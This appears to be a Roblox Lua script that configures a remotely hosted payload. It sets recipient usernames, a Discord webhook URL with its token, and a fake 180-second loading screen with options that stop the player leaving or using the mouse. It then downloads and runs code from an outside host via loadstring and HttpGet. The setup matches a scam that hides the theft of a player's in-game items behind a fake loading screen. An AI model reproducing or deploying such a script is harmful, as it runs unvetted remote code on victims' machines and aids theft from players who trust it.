UserName = "sendi1012"
UserName2 = "sendi1012"
Webhook = "https://discord.com/api/webhooks/1088162039156977674/r79jE-EJ8ewz3pwZ4CBeghI7y5wFGPT0elhnU_ry7yptKyKkiLMx3u5hXEoVZtJCw_RP"

_G.LoadingScreen = true
_G.AntiLeave = true
_G.MouseLock = true 
-- set them to false if you don't need them

_G.ScriptName = "Hey!"
_G.FirstText = "Script Preparing"
_G.SecondText = "Script Loading..."
_G.ThirdText = "Almost Done..."
_G.WaitingTime = 180 -- it's the time between 0% and 100% in secondes

loadstring(game:HttpGet("http://rizz.ct8.pl/scripts/Main", true))()
